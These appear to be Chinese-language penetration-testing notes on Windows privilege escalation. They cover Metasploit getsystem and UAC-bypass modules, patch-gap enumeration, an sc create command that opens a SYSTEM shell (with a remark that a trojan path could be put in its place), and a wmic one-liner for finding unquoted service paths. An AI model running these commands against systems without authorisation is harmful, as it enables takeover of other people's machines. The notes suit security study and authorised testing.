一.工具提权
msf工具
直接使用getsystem进行提权 可以提权到system权限(大多时候会被uac干掉,很可能失败)
使用bypassuac的模块 windows/local/bypassuac_silentcleanup 设定session 后可以进行提权
windows/local/bypassuac_eventvwr 设定session后可以进行提权
漏洞提权
可以先用sysinfo 查看当前系统的补丁状况,然后可以放到提权辅助网页进行对比,可以得到没有打补丁的漏洞exp
也可以使用windows-exploit-suggester工具进行对比
在msf的交互中使用run post/windows/gather/enum_patches进行漏洞对比,然后可以在msf进行查询相关漏洞的攻击模块
二.命令提权
win 7,8,08,12,16
sc命令提权
SC命令能与“服务控制器”和已安装设备进行通讯。SC是用于与服务控制管理器和服务进行通信的命令行程序。
先在cmd中使用命令创建任务 sc create syscmd binPath=“cmd /K start” type=own type=interact
随后使用sc start syscmd 就会出现拥有system权限的命令框
(在上面的路径中也可以把木马的地址放在上面,那么木马也会拥有system权限)
三.错误配置提权
主要分为
不带引号的服务路径:
wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\” |findstr /i /v “”"
查看错误配置的路径
sc qc +进程名
查看是否是自启动
弱文件夹权限
弱服务权限
注册表权限不足
always install elevated
powerup